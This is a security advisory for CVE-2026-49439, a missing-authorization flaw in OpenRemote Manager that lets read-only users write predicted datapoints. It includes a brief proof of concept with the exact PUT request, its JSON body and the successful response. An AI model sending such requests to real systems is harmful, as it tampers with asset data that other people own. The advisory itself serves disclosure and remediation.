PT-2026-56050 · Maven · Io.Openremote:Openremote-Manager
Publicado
2026-07-06
·
Atualizado
2026-07-06
·
CVE-2026-49439
CVSS v3.1
4.3
Média
| Vetor | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
Summary
The predicted datapoint write endpoint allows users with only
read:assets privileges to write predicted datapoints.The endpoint:
text
PUT /api/{realm}/asset/predicted/{assetId}/{attributeName}accepts write requests from users lacking
write:assets.The implementation appears to check
READ ASSETS while performing a write operation through:java
assetPredictedDatapointService.updateValues(...)PoC
A user was created with only:
text
read:assetsand without
write:assets.The following request succeeded:
http
PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperatureRequest body:
json
[{"x":1779199999001,"y":1337}]Response:
text
HTTP/2 204Database verification confirmed the datapoint was written successfully:
text
entity id: 4Fr8Pcp7iDjrEmoSUFolvT
attribute name: temperature
value: 1337Impact
Users with read-only asset permissions can modify predicted datapoints for assets.
Correção
Missing Authorization
Encontrou algum problema na descrição? Tem algo a acrescentar? Fique à vontade para nos escrever 👾
Enumeração de Fraquezas
Identificadores relacionados
Produtos afetados
Io.Openremote:Openremote-Manager